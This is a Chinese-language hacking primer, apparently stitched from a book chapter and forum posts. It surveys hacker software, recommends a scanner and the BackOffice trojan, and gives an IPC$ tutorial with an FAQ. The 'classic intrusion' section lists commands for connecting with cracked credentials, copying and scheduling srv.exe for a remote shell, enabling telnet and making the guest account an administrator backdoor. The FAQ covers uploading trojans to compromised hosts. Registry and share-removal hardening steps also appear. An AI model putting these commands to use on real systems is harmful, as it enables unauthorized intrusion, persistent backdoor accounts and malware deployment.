一、防范: 这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私,不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的,如日志分析软件、系统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。 二、信息搜集: 信息搜集软件种类比较多,包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件;还有监听、截获信息包等间谍类软件,其大多数属于亦正亦邪的软件,也就是说无论正派黑客、邪派黑客、系统管理员还是一般的电脑使用者,都可以使用者类软件完成各自不同的目的。在大多数情况下,黑客使用者类软件的频率更高,因为他们需要依靠此类软件对服务器进行全方位的扫描,获得尽可能多的关于服务器的信息,在对服务器有了充分的了解之后,才能进行黑客动作。 三、木马与蠕虫: 这是两种类型的软件,不过他们的工作原理大致相同,都具有病毒的隐藏性和破坏性,另外此类软件还可以由拥有控制权的人进行操作,或由事先精心设计的程序完成一定的工作。当然这类软件也可以被系统管理员利用,当作远程管理服务器的工具。 四、洪水: 所谓“洪水”即信息垃圾炸弹,通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃,近年来网络上又开始流行DOS分散式攻击,简单地说也可以将其归入此类软件中。洪水软件还可以用作邮件炸弹或者聊天式炸弹,这些都是经过简化并由网络安全爱好者程序化的“傻瓜式”软件,也就是本书一开始指责的“伪黑客”手中经常使用的软件。 五、密码破解: 网络安全得以保证的最实用方法是依靠各种加密算法的密码系统,黑客也许可以很容易获得一份暗文密码文件,但是如果没有加密算法,它仍然无法获得真正的密码,因此使用密码破解类软件势在必行,利用电脑的高速计算能力,此类软件可以用密码字典或者穷举等方式还原经过加密的暗文。 六、欺骗: 如果希望获得上面提到的明文密码,黑客需要对暗文进行加密算法还原,但如果是一个复杂的密码,破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型,是不是更加方便?欺骗类软件就是为了完成这个目的而设计的。 七、伪装: 网络上进行的各种操作都会被ISP、服务器记录下来,如果没有经过很好的伪装就进行黑客动作,很容易就会被反跟踪技术追查到黑客的所在,所以伪装自己的IP地址、身份是黑客非常重要的一节必修课,但是伪装技术需要高深的网络知识,一开始没有坚实的基础就要用到这一类软件了。 第五节、学习黑客的基本环境 一、操作系统的选择: 我们经常听说黑客酷爱Linux系统,这是因为Linux相对Windows提供了更加灵活的操作方式,更加强大的功能。例如对于IP地址的伪造工作,利用Linux系统编写特殊的IP头信息可以轻松完成,然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面,这个系统的命令庞杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有过多的人会放弃“舒适”的Windows、放弃精彩的电脑游戏和便捷的操作方式,去全心投入黑客学习中。而且对于初学黑客的学习者来说,大多数网络知识都可以在Windows系统中学习,相对Linux系统,Windows平台下的黑客软件也并不在少数,另外通过安装程序包,Windows系统中也可以调试一定量的程序,因此初步学习黑客没有必要从Linux入手。 本书使用的平台WindowsME,因为对于个人用户来说,NT或者2000多少有些苛刻——系统配置要求太高;然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容测试漏洞,从远程服务器出发,所以也不是非要WindowsME操作系统进行学习,对于少数系统版本之间的差异,学习者可以和我联系获得相应系统的学习方法。 二、需要的常用软件: 如果你的系统是WindowsME,那么告诉你一个好消息——你没有必要安装过多的额外软件,因为我们接触的黑客知识依靠系统提供给我们的命令和内置软件就足可以完成了!除了基本的操作系统以外,学习者还需要安装各类扫描器,之后下载一个比较优秀的木马软件、一个监听类软件,除此以外别无它求。如果有必要,读者可以自行安装本文上述软件,然后学习其用法,但是我要告诉你,对于各类炸弹、还有网络上各式各样的黑客软件,在学习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软件。 对于扫描器和监听软件,我给出以下建议,并且在本书的后面还会对这几个软件进行详细介绍: 扫描器:x-scanner 监听软件:analyzer 下载地址:http://netgroup-serv.polito.it/netgroup/tools.html 木马:BackOffice 这三个软件都是免费的,而且功能异常强大。像xscanner是国产软件,他集成了多种扫描功能于一身,并且同时支持控制台和图形界面两种操作方式,另外提供了详细的漏洞使用说明。对于初学者来说,具备了这两个工具,学习黑客已经绰绰有余了。 三、额外的工具: 如果可以安装下面的工具,将会对学习黑客有莫大的帮助,当然下面的软件主要是学习额外内容并为“第二部分”学习作铺垫用的,所以没有也不会妨碍本书的学习。 1、后台服务器: 拥有某些网络应用的后台服务程序,可以将自己的电脑设置成一个小型服务器,用来学习相应的网络应用,从“内部”了解其运作机理,这将会大大提高自己对服务器的感性认识,同时还能够在激活服务器的时候;监测自己服务器上的数据,如果有其他黑客来攻击,则可以清晰的记录下对方的攻击过程,从而学习到更多的黑客攻击方法。对于本书而言,主要介绍网站的Perl和asp等脚本语言漏洞,所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl,使自己的服务器具备编译cgi和pl脚本的能力。使用自己的服务器还有一个好处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、有不会对网络构成威胁,一举两得。 2、C语言编译平台: 今后在学习黑客的路途中,将会遇到很多“属于自己的问题”,这些问题网络上的其他人可能不会注意,所以无法找到相应的程序,这个时候学习者就要自己动手开发有关的工具了,所以安装一个BorlandC++将会非常便捷,通过这个编译器,学习者既可以学习C语言,也能够修改本书后面列出的一些小程序,打造一个属于自己的工具库。 四、网络安全软件分类 现在我们来了解一下有关网络安全软件的分类,因为学习黑客知识是两个相互联系的过程:既学习如何黑,还要学会如何防止被黑。 1、防火墙: 这是网络上最常见的安全机制软件,防火墙有硬件的、也有软件的,大多数读者看到的可能更多都是软件防火墙。其功能主要是过滤垃圾信息(保证系统不会受到炸弹攻击)、防止蠕虫入侵、防止黑客入侵、增加系统隐私性(对敏感数据进行保护)、实时监控系统资源,防止系统崩溃、定期维护数据库,备份主要信息……防火墙可以将系统本身的漏洞修补上,让黑客没有下手的机会。另外对于拥有局域网的企业来说,防火墙可以限制系统端口的开放,禁止某些网络服务(杜绝木马)。 2、检测软件: 互联网上有专门针对某个黑客程序进行清除的工具,但是这类软件更多是集成在杀毒软件或者防火墙软件内的,对于系统内的木马、蠕虫可以进行检测并清除,软件为了保护系统不受侵害,会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放状态等。如果用户需要,软件还可以编写有关的脚本对指定端口进行屏蔽(防火墙一样具备此功能)。 3、备份工具: 专门用来备份数据的工具可以帮助服务器定期备份数据,并在制定时间更新数据,这样即便黑客破坏了服务器上的数据库,软件也可以在短时间内完全修复收到入侵的数据。另外对于个人用户,这类软件可以对硬盘进行完全映像备份,一旦系统崩溃,用户利用这类软件可以将系统恢复到原始状态,例如Ghost就是这类软件中的佼佼者。 4、日志纪录、分析工具: 对于服务器来说,日志文件是必不可少的,管理员可以通过日志了解服务器的请求类型和请求来源,并且根据日志判断系统是否受到黑客攻击。通过日志分析软件,管理员可以轻松的对入侵黑客进行反追踪,找到黑客的攻击来源,进而抓不黑客。这也就是为什么黑客在攻击的时候多采用IP地址伪装、服务器跳转,并在入侵服务器之后清除日志文件的原因。 |
| IPC$命令详解: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少). 因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复! 二 什么是ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的. 解惑: 1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。 也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的) 2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接 3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立ipc$连接在hack攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:( 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接. 所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在. 四 ipc$与空连接,139,445端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 2)ipc$与139,445端口: ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下5个原因是比较常见的: 1)你的系统不是NT或以上操作系统; 2)对方没有打开ipc$默认共享 3)对方未开启139或445端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows 无法找到网络路径 : 网络有问题; 错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 错误号1326,未知的用户名或错误密码 : 原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就*大家自己体会和试验了. 六 如何打开目标的IPC$(此段引自相关文章) 首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。 七 如何防范ipc$入侵 1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》) 首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等) 2禁止默认共享 1)察看本地共享资源 运行-cmd-输入net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有e,f,……可以继续删除) 3)停止server服务 net stop server /y (重新启动后server服务会重新开启) 4)修改注册表 运行-regedit server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。 pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务 控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用 4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师 5设置复杂密码,防止通过ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推) 如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的c盘,其他盘类推 net use * /del 删除全部,会有提示要求按y确认 九 经典入侵模式 这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈) 11. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般用流光,通过扫描弱口令来得到,管理员帐号和密码. 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现127.0.0.1 的当前时间是 2004/6/15 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果127.0.0.1 的当前时间是 2004/6/15 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将Guest变为Administrator(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
ipc$常见问题:
1,怎样建立空连接,它有什么用?
答:使用命令 net use \IPipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。
2.为什么我连不上IPC$?
答:1.只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2.确认你的命令没有打错。正确的命令是: net use \目标IPipc$ "密码" /user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3,根据返回的错误号分析原因:
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows 无法找到网络路径 : 网络有问题;
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码 : 原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。
5,怎样打开目标的IPC$?
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。
6,怎样映射和访问默认共享?
答:使用命令 net use z: \目标IPc$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \IPd$pathmuma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包含空格时,须用""将路径全引住。
7,如何删除映射和ipc$连接?
答:用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘,其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
8,连上ipc$然后我能做什么?
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。
9,怎样防止别人用ips$和默认共享入侵我?
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。
1,先把已有的删除
net share ipc$ /del
net share admin$ /del
net share c$ /del
…………(有几个删几个)
2,禁止别人空连接
首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous(DWORD)的键值改为:00000002。
3,禁止自动打开默认共享
对于server版,找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建一个再改键值。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
net stop lanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤